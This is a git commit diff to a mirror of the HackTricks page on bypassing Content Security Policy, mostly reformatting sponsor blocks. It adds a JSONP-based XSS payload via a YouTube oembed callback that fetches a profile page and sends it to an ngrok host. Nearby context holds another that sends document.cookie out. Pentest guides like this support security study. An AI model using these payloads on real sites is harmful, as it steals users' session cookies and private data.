mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
GITBOOK-3813: No subject
This commit is contained in:
parent
df3103dbf8
commit
a67c417bb8
1 changed files with 12 additions and 18 deletions
|
@ -12,10 +12,9 @@
|
|||
|
||||
</details>
|
||||
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
|
||||
|
||||
🐞 Read web3 bug tutorials
|
||||
|
||||
|
@ -23,9 +22,6 @@
|
|||
|
||||
💬 Participate in community discussions
|
||||
|
||||
|
||||
|
||||
|
||||
## What is CSP
|
||||
|
||||
Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of resources being allowed from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:`
|
||||
|
@ -250,7 +246,7 @@ The post shows that you could **load** all **libraries** from `cdn.cloudflare.co
|
|||
### Third Party Endpoints + JSONP
|
||||
|
||||
```http
|
||||
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none';
|
||||
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
|
||||
```
|
||||
|
||||
Scenarios like this where `script-src` is set to `self` and a particular domain which is whitelisted can be bypassed using JSONP. JSONP endpoints allow insecure callback methods which allow an attacker to perform XSS, working payload:
|
||||
|
@ -260,6 +256,11 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
|
|||
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
|
||||
```
|
||||
|
||||
```html
|
||||
https://www.youtube.com/oembed?callback=alert;
|
||||
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
|
||||
```
|
||||
|
||||
[**JSONBee**](https://github.com/zigoo0/JSONBee) **contains ready to use JSONP endpoints to CSP bypass of different websites.**
|
||||
|
||||
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
|
||||
|
@ -462,10 +463,9 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
|
|||
|
||||
Trick from [**here**](https://ctftime.org/writeup/29310).
|
||||
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
|
||||
|
||||
🐞 Read web3 bug tutorials
|
||||
|
||||
|
@ -473,9 +473,6 @@ Trick from [**here**](https://ctftime.org/writeup/29310).
|
|||
|
||||
💬 Participate in community discussions
|
||||
|
||||
|
||||
|
||||
|
||||
## Unsafe Technologies to Bypass CSP
|
||||
|
||||
### PHP response buffer overload
|
||||
|
@ -594,9 +591,9 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
|
||||
|
||||
🐞 Read web3 bug tutorials
|
||||
|
||||
|
@ -604,9 +601,6 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
|
|||
|
||||
💬 Participate in community discussions
|
||||
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
|
Loading…
Reference in a new issue